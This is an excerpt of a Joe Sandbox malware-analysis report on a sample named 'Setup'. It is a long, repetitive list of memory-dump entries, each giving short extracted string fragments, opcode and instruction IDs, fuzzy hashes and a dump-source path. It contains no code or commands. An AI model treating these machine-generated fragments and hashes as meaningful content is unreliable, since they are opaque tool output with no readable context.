                                                                                                                      • String ID: aF,J$eklj$fd}e$zkmq
                                                                                                                      • API String ID: 0-2764528280
                                                                                                                      • Opcode ID: c166cb08329f5b04623dfd280a809af5f6211531272d416dafb3ee834af0b2e0
                                                                                                                      • Instruction ID: ea1b9f80124e765cf8da6c20580f6ca45e9f473f4a6739413e3e516237742edd
                                                                                                                      • Opcode Fuzzy Hash: c166cb08329f5b04623dfd280a809af5f6211531272d416dafb3ee834af0b2e0
                                                                                                                      • Instruction Fuzzy Hash: 6271DDB580C3D28AE331CF248860BABBBE1AFD2310F188A5DD4D91B241D7750949DBA7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Z[$tA$~I$hij
                                                                                                                      • API String ID: 0-2266829492
                                                                                                                      • Opcode ID: ea79563e6d9ffba94bfa74acd0dc2774e550cb3fb8ce33989d7d795dff2d7bd2
                                                                                                                      • Instruction ID: 10323135acaebdec5368cf835219970f77d0afd6959e9b772a5695489c0e750f
                                                                                                                      • Opcode Fuzzy Hash: ea79563e6d9ffba94bfa74acd0dc2774e550cb3fb8ce33989d7d795dff2d7bd2
                                                                                                                      • Instruction Fuzzy Hash: 1F41E1B551C3908BD734CF26881279FBBE2EBD2314F15982CE4D95B261DB3988068B47
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: H%C'$f!K#$p-./
                                                                                                                      • API String ID: 0-2974429307
                                                                                                                      • Opcode ID: 5a3c13b29a2b3e16702866ae3d4ba5a4c1906d72a9a1ecbd3ccc999e87155648
                                                                                                                      • Instruction ID: 2cb4cc918d6c60333204818a5ad66a8f81e5576131acc272ef41ecdb773e4926
                                                                                                                      • Opcode Fuzzy Hash: 5a3c13b29a2b3e16702866ae3d4ba5a4c1906d72a9a1ecbd3ccc999e87155648
                                                                                                                      • Instruction Fuzzy Hash: CDF13C72A083118BC324CF24C8816ABB7F2EFD5764F19892DE8C967354E7359D42DB46
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ?$ORVM$k
                                                                                                                      • API String ID: 0-55357630
                                                                                                                      • Opcode ID: fbd373faa507808f58788a0a505c1da9e6e9d065e00a1281701ccc69e3b979d2
                                                                                                                      • Instruction ID: c58ab7939d935d10f4b6702e45ec0dbd7cb419a80d3cfbb00bbb55962728b8b8
                                                                                                                      • Opcode Fuzzy Hash: fbd373faa507808f58788a0a505c1da9e6e9d065e00a1281701ccc69e3b979d2
                                                                                                                      • Instruction Fuzzy Hash: 51F1F5319083908ED739CB3984917AABBE2AFD3314F48895ED4DD9B282C635950ADB53
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: CB$RI[Q$`
                                                                                                                      • API String ID: 0-2295409773
                                                                                                                      • Opcode ID: c6c088c21bfa332d30505d7626a9c096663668818f15a18c66d01bff54d1147c
                                                                                                                      • Instruction ID: 3214f290abdd75bf09168a7a44de6cd4324ff14bc96ef081bf46a8824a873a3c
                                                                                                                      • Opcode Fuzzy Hash: c6c088c21bfa332d30505d7626a9c096663668818f15a18c66d01bff54d1147c
                                                                                                                      • Instruction Fuzzy Hash: 5D7107709083918FD3168F2984A07BBBFE09F93316F18996DE8D25B341D239890ED767
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4$]$hS
                                                                                                                      • API String ID: 0-1124971902
                                                                                                                      • Opcode ID: ce09a96bb01c16b6bf089250bfeced17cca153f6ab1a69a72e7040e562f64231
                                                                                                                      • Instruction ID: 5cd382c3b56b1da6f827915f6cf1f8786bdc7b6eea7894c2ba5f35ef28f38a3a
                                                                                                                      • Opcode Fuzzy Hash: ce09a96bb01c16b6bf089250bfeced17cca153f6ab1a69a72e7040e562f64231
                                                                                                                      • Instruction Fuzzy Hash: EB71157590C3C04BD325CB3988617ABBBE19FE7320F2C98ADD4DD4B282DA74440A9B17
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 7$gfff$tu
                                                                                                                      • API String ID: 0-496940666
                                                                                                                      • Opcode ID: bbe88fec5e0e69ebaf226319a8808b249dd267ef961dab8d8ee8f358fd57b881
                                                                                                                      • Instruction ID: de2049fa99a400303858f11e24af236ee4e096d7a1cb51a289e0c88d1d4a352b
                                                                                                                      • Opcode Fuzzy Hash: bbe88fec5e0e69ebaf226319a8808b249dd267ef961dab8d8ee8f358fd57b881
                                                                                                                      • Instruction Fuzzy Hash: 596148B1A143528BD724CF28C8517AF77E1EBC5314F088A3DE481CB395EB78990AD785
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ^D$iM$tz
                                                                                                                      • API String ID: 0-1308588582
                                                                                                                      • Opcode ID: be418bf378c91306d3eba410395231f4f206328f7a41d4ffb56c8c16cf91d891
                                                                                                                      • Instruction ID: a88f6236a50e5121a82f9bb55021753c6980a8ef7843e6982466c31682f9a53f
                                                                                                                      • Opcode Fuzzy Hash: be418bf378c91306d3eba410395231f4f206328f7a41d4ffb56c8c16cf91d891
                                                                                                                      • Instruction Fuzzy Hash: 8051BCB054C3409FE350CF51898066ABFE1EB86624F508D6DF2D5AB251C37CD90A9F5B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: FG$CE
                                                                                                                      • API String ID: 0-3557296681
                                                                                                                      • Opcode ID: e2e856dc5bf7e24c6acc147266234d3c967de2305a15f261b315160cc5e78bf0
                                                                                                                      • Instruction ID: 0ac2ee4227df027bf56203f6928b695f7921b981920e6760572a41fb30410fc7
                                                                                                                      • Opcode Fuzzy Hash: e2e856dc5bf7e24c6acc147266234d3c967de2305a15f261b315160cc5e78bf0
                                                                                                                      • Instruction Fuzzy Hash: 86925575A483409BEB209F64CC9176EBBE2EBD1310F19882CE4C5C7361D779CD46AB92
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0$8
                                                                                                                      • API String ID: 0-46163386
                                                                                                                      • Opcode ID: a7d66734641d3e36a594821e561c6b2239521bb10fd44a574eda573800cb278b
                                                                                                                      • Instruction ID: fb93d6333b2b6be9374bb1420e38ded7e0d4653b5d5c59c4967eb32625ca59f6
                                                                                                                      • Opcode Fuzzy Hash: a7d66734641d3e36a594821e561c6b2239521bb10fd44a574eda573800cb278b
                                                                                                                      • Instruction Fuzzy Hash: 987267716083409FDB14CF18C880B6BBBE1AFD8315F48892DFA998B391D775D948DB92
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )^2D$ITZ)
                                                                                                                      • API String ID: 0-2563508238
                                                                                                                      • Opcode ID: ac5599459565b66d8551e7380319e8a0b5832253677ac1755b87bf9f69ba44be
                                                                                                                      • Instruction ID: b85240633ba3dfe380c8380e2d6a0bb1026362acd18a23122dbe3cebbc5333f6
                                                                                                                      • Opcode Fuzzy Hash: ac5599459565b66d8551e7380319e8a0b5832253677ac1755b87bf9f69ba44be
                                                                                                                      • Instruction Fuzzy Hash: D9B17C3296C3458BC714AE688C902BAB791DF95320F19C63EE9998F395E374C909F743
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %21&$7k2?
                                                                                                                      • API String ID: 0-1884281822
                                                                                                                      • Opcode ID: 66227034d83682becebc55fb7c46454e24ffa6e9420e40451ed16fef4ab66ec5
                                                                                                                      • Instruction ID: 0fe86a6148b585eec65f0c8cb9fda032a374b7ae056c184e1fab0c6f5915868d
                                                                                                                      • Opcode Fuzzy Hash: 66227034d83682becebc55fb7c46454e24ffa6e9420e40451ed16fef4ab66ec5
                                                                                                                      • Instruction Fuzzy Hash: 3AB11A76A2C3048BDB18EF288C9167B77A1DB95310F19C53EE84A87391E734DD09E792
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "!"#$^]^_
                                                                                                                      • API String ID: 0-47444839
                                                                                                                      • Opcode ID: 789d7801fbb448be4305c1218fb870f8c370c956875558d218d5559b23e331b5
                                                                                                                      • Instruction ID: 74c98c7e1a5fef1a75e762711a87cfc0ed5d5e2b50cbc294aaf104f4203f5930
                                                                                                                      • Opcode Fuzzy Hash: 789d7801fbb448be4305c1218fb870f8c370c956875558d218d5559b23e331b5
                                                                                                                      • Instruction Fuzzy Hash: B2916872A083119FD718DF24C8916AFB7A2EFD9320F19853CE99647391E7319C06D792
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )$IEND
                                                                                                                      • API String ID: 0-707183367
                                                                                                                      • Opcode ID: cfd50f34b4b111bc692558c747f352226f39c852f1680d7b9b0f98d1a90aec3e
                                                                                                                      • Instruction ID: 690244111b2a0b817925a2e68e9a3046bd0663fe539c8f4ac9d1bdd5884b0820
                                                                                                                      • Opcode Fuzzy Hash: cfd50f34b4b111bc692558c747f352226f39c852f1680d7b9b0f98d1a90aec3e
                                                                                                                      • Instruction Fuzzy Hash: F1D1DEB1908704AFEB20CF24CC5575ABBE4AB94714F14482DFE989B381D379E90CDB92
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: F^$I@
                                                                                                                      • API String ID: 0-534856466
                                                                                                                      • Opcode ID: a32a9dc7eeddbedd839400483b8a8f963e09df8e8f66ea590f5c168d3f478726
                                                                                                                      • Instruction ID: 3c4911de39f2c1275240ba026057a6fc0b7e5ecde07266cf7bc7faf9ee6e2c01
                                                                                                                      • Opcode Fuzzy Hash: a32a9dc7eeddbedd839400483b8a8f963e09df8e8f66ea590f5c168d3f478726
                                                                                                                      • Instruction Fuzzy Hash: DF91F1B5604B418FD729CF25C8C0222BBA2FF9A310728D69CC9D64F75AC739E846CB54
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: D$O
                                                                                                                      • API String ID: 0-2673426857
                                                                                                                      • Opcode ID: 567f6c4c48f4137629e781d787f02d8cd4f67ae02b060591f06839363b0c9ef2
                                                                                                                      • Instruction ID: f1f8d615fdfa61a6e0d7fc5c6c111ffa92f4e102634bb6fc9179d0a901425b44
                                                                                                                      • Opcode Fuzzy Hash: 567f6c4c48f4137629e781d787f02d8cd4f67ae02b060591f06839363b0c9ef2
                                                                                                                      • Instruction Fuzzy Hash: D58168B0408350CFD3248F14C4A176BBBF0FF86364F095A4CE1899F2A1E7798945DB5A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: h]D$h]D
                                                                                                                      • API String ID: 0-795229245
                                                                                                                      • Opcode ID: df2c9d3d244a152d65878dd7051cea82ddd3c82e19eba4ece060498254321ec4
                                                                                                                      • Instruction ID: fd5048987a9341372859d433dfea53d723296dcfa7ae796939b21675fec36ec3
                                                                                                                      • Opcode Fuzzy Hash: df2c9d3d244a152d65878dd7051cea82ddd3c82e19eba4ece060498254321ec4
                                                                                                                      • Instruction Fuzzy Hash: 4D41F67178A3404FE328DF65AC5569BB792EFD2314F0C8A3DD4D45B252C67485068B4A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: EL`S$IL`S
                                                                                                                      • API String ID: 0-835728070
                                                                                                                      • Opcode ID: 49b229a82fa9b6443c9ebcba9197cf59d6845de22c2578e4d544e600f1ee7ae2
                                                                                                                      • Instruction ID: ddbd33b8d63f4fe06bc25800608355cbe21607820c7cfda9ed4f6a2168a00b31
                                                                                                                      • Opcode Fuzzy Hash: 49b229a82fa9b6443c9ebcba9197cf59d6845de22c2578e4d544e600f1ee7ae2
                                                                                                                      • Instruction Fuzzy Hash: 68314971B5C71D0B872CBEA8DCAA27BB295E7C9720F05823DD6468B6C0E670D84563C5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 1n3$45
                                                                                                                      • API String ID: 0-3766162355
                                                                                                                      • Opcode ID: 36d48fe7a16609564501297ca801abdfd53092ff14febe9b56a361aef12e21ee
                                                                                                                      • Instruction ID: 3773a02bcca58607b3a8cdcdda0572768cf438f74f5fea0c9a7afd6140764acf
                                                                                                                      • Opcode Fuzzy Hash: 36d48fe7a16609564501297ca801abdfd53092ff14febe9b56a361aef12e21ee
                                                                                                                      • Instruction Fuzzy Hash: 8DF0E2107483409BD314EEA19891377B7A2DF96321F98D93DD18947686D73A88429B4A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: f
                                                                                                                      • API String ID: 0-1993550816
                                                                                                                      • Opcode ID: d0b34d68d3df6efbda9fc8437e7a948d6aac3e6ad22661326aed8b9a37770fea
                                                                                                                      • Instruction ID: 6a6eab25de9c4d013616d3284bee1d1093d5fc24da21a5535a175ffdce2055b4
                                                                                                                      • Opcode Fuzzy Hash: d0b34d68d3df6efbda9fc8437e7a948d6aac3e6ad22661326aed8b9a37770fea
                                                                                                                      • Instruction Fuzzy Hash: A5125730A0C3418FE714DF25C880B6AB7E5EBC6310F298A6EE59587391D734DD06DB92
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: KL
                                                                                                                      • API String ID: 0-759073162
                                                                                                                      • Opcode ID: f78e050e7df1b375b928a6c63cce9ef24adb00eb06fdda9f2cd2c00e641377fd
                                                                                                                      • Instruction ID: ce7635dc1b7176da35f09418348b382d1dc87d58afad9bfdbcd3f63f4e1643eb
                                                                                                                      • Opcode Fuzzy Hash: f78e050e7df1b375b928a6c63cce9ef24adb00eb06fdda9f2cd2c00e641377fd
                                                                                                                      • Instruction Fuzzy Hash: 5DC13872A18301ABD718DB24CC92A67B3E5EFD5320F19C42EE8C987291E378D905E753
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "
                                                                                                                      • API String ID: 0-123907689
                                                                                                                      • Opcode ID: d1147688746ac9fccad603f94786fbe4cebdd8e48ee3afe1d6416b727fb0bed2
                                                                                                                      • Instruction ID: 3d644042dbb5d8627fbd267e2dce727515187fe38784479d8cc7ea95f1b3cfc1
                                                                                                                      • Opcode Fuzzy Hash: d1147688746ac9fccad603f94786fbe4cebdd8e48ee3afe1d6416b727fb0bed2
                                                                                                                      • Instruction Fuzzy Hash: CCC1F872E083055BD715CE24C840B6AB7D96F86320F18C56FE89D8B282D734DD49E793
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: gI
                                                                                                                      • API String ID: 0-1684346539
                                                                                                                      • Opcode ID: 91881b8686042df67e6e2379ffed42cdcd2e19657a4490797ad271727e1802b7
                                                                                                                      • Instruction ID: b67d1a1576968b66ffc5b63fc57a9e692c11bb75b5c27e7dc0e4ea115072449a
                                                                                                                      • Opcode Fuzzy Hash: 91881b8686042df67e6e2379ffed42cdcd2e19657a4490797ad271727e1802b7
                                                                                                                      • Instruction Fuzzy Hash: F07113719147158BCB249F28C8A267BB3F0FF85B24F08451CE8929B391F778E908D766
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: rLMN
                                                                                                                      • API String ID: 0-1296146032
                                                                                                                      • Opcode ID: 398a0f2d3e1c1d23b7c6520c3d68cfb8c2b6022d5b9c1086113ae940e227c2de
                                                                                                                      • Instruction ID: d3120b122716bf1ceecd7194f3fb51519135ce16e4eddcfb527d95ab6c1ccb3b
                                                                                                                      • Opcode Fuzzy Hash: 398a0f2d3e1c1d23b7c6520c3d68cfb8c2b6022d5b9c1086113ae940e227c2de
                                                                                                                      • Instruction Fuzzy Hash: 5781A033E0C32187D7189E19D88025BB7D2DBC1721F198A18CED5973A5F6B5DD0997C0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 0-3887548279
                                                                                                                      • Opcode ID: 0c82f8379e64b88f35724f119d3cf2b67391bde1a13814e9a5c5f408a5e07d30
                                                                                                                      • Instruction ID: 7f6ec37c20cda5348b9c1d1ec6e8490496e8f8f780f07d23c4a972c703b82b6f
                                                                                                                      • Opcode Fuzzy Hash: 0c82f8379e64b88f35724f119d3cf2b67391bde1a13814e9a5c5f408a5e07d30
                                                                                                                      • Instruction Fuzzy Hash: 9C812B37A49A904BD328657C4C213E6BA934BD2330F6DC76DAAF5873E5DD694C096380
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: &
                                                                                                                      • API String ID: 0-3390501888
                                                                                                                      • Opcode ID: 0d5780fbc8d24e1e1e81f1bc3cfe6d91a4b4317c0a7e1ad3b4941d654a8b5336
                                                                                                                      • Instruction ID: 82abe1797b99d3fe46e1d0b40e0ab6aa6fac784cb800843956e44aeaa31178e5
                                                                                                                      • Opcode Fuzzy Hash: 0d5780fbc8d24e1e1e81f1bc3cfe6d91a4b4317c0a7e1ad3b4941d654a8b5336
                                                                                                                      • Instruction Fuzzy Hash: 1B515937B993504BE314D979DC902ABBBD2E7D6220F1ECA3DC8D9D7681D5349C068392
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 0-4108050209
                                                                                                                      • Opcode ID: 05532b159bf6474b3e019f0902b2fdf49e768b932424ed923cdf3f2e63f8db18
                                                                                                                      • Instruction ID: 073e1ebff0eeccfb45ca0d85a0ac7efcf4842b59a5d40c0ab1437923bd8e909d
                                                                                                                      • Opcode Fuzzy Hash: 05532b159bf6474b3e019f0902b2fdf49e768b932424ed923cdf3f2e63f8db18
                                                                                                                      • Instruction Fuzzy Hash: 84713933F9A9904BC368997C4C623EAB9834BD6330B2DC37EE9B19B3E5C5695C055390
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 0-3887548279
                                                                                                                      • Opcode ID: 165a8bd25a51287d61cc56abe06e0e9731a5aee266c89a6541f75a04c61fab67
                                                                                                                      • Instruction ID: 5a4849bcaecf0c1282102a6e25fed67bdbc0d5cd990d1489ac25e4f22dda432c
                                                                                                                      • Opcode Fuzzy Hash: 165a8bd25a51287d61cc56abe06e0e9731a5aee266c89a6541f75a04c61fab67
                                                                                                                      • Instruction Fuzzy Hash: AB712623B596D04BD328897CAC623AABA934B96330F1CC77DE9F5C73D1D5598C09A341
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !
                                                                                                                      • API String ID: 0-2657877971
                                                                                                                      • Opcode ID: c483d85ef1919def979feee9534c80b25d71b03633a277f91076f9e9e47289f1
                                                                                                                      • Instruction ID: b3a4701b870876eab53d285aef653c6ee4c10d7c5330f5595283023dd5ca928d
                                                                                                                      • Opcode Fuzzy Hash: c483d85ef1919def979feee9534c80b25d71b03633a277f91076f9e9e47289f1
                                                                                                                      • Instruction Fuzzy Hash: 1781A47250D3808BC764DF38C4913AEBBE1AF99364F144A2EE9D9C7382D6758545AB03
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 0-4108050209
                                                                                                                      • Opcode ID: b11972617b3a9d936a79911975f1b20e723312b6452449311793f13b356f1164
                                                                                                                      • Instruction ID: 04e80e40284a306ef1da3f6b0a263f2324e6db0a99ea99d8187182a4782aadcf
                                                                                                                      • Opcode Fuzzy Hash: b11972617b3a9d936a79911975f1b20e723312b6452449311793f13b356f1164
                                                                                                                      • Instruction Fuzzy Hash: 88B10721108FC28ED336C73C8858797BED16B67224F088B9ED1FB5B7D2D6A56006D762
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
